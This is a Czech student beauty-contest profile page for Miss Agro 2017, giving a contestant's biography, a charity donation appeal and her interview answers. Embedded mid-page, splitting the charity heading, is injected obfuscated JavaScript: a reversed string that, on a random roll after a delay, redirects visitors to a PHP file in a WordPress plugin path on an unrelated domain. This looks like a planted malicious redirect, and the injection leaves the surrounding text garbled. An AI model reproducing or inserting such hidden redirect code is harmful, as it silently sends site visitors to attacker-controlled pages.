Kateřina Musalová

Profil

Fotografie

Fakulta: PEF
Obor: Podnikání a administrativa (PAA)
Ročník: 1.
Věk:
20

Kateřina se už od útlého věku věnovala latinskoamerickým tancům, které před rokem soutěžně ukončila. Kromě tance má ráda adrenalinové zážitky, cestuje a poznává nová místa. Během svých studií by ráda v rámci programu Erasmus vycestovala do zahraničí a zdokonalila se v angličtině. V jídle je celkem vybíravá, ale sladkému nikdy neodolá. Je upřímná, má smysl pro humor a je nejraději ve společnosti. Do Miss Agro se přihlásila, protože je to pro ni výzva a možnost získat nové zkušenosti.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523503771{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

Jelikož jsem se ještě před rokem soutěžně věnovala tanci, tak jsem zvyklá na sobě pracovat, a to jak fyzicky, tak mentálně. Jsem cílevědomá a odhodlaná si jít za svými sny, zároveň jsem sebekritická a snažím se na svých nedostatcích pracovat.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Myslím si, že každý by měl být rád za to kým je. Bez ohledu na překážky, které nám osud připraví, se snažit žít svůj život naplno. Asi bych udělala jinak pár svých životních rozhodnutí, ale stále bych chtěla být sama sebou a mít kolem sebe lidi, na kterých mi nejvíc zaleží.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Mám spoustu známých a kamarádů, kteří tuto školu studovali nebo ještě studují a doporučili ji. Proto jsem neváhala se na školu přihlásit a jsem velmi spokojena. Kromě krásného areálu se mi nejvíce libí, jak jsou na škole všichni ochotní si pomáhat a táhnout za jeden provaz. Ve srovnání se střední je tohle pro mě obrovská změna a nesmírně si vážím kolektivu, který kolem sebe na ČZU mám.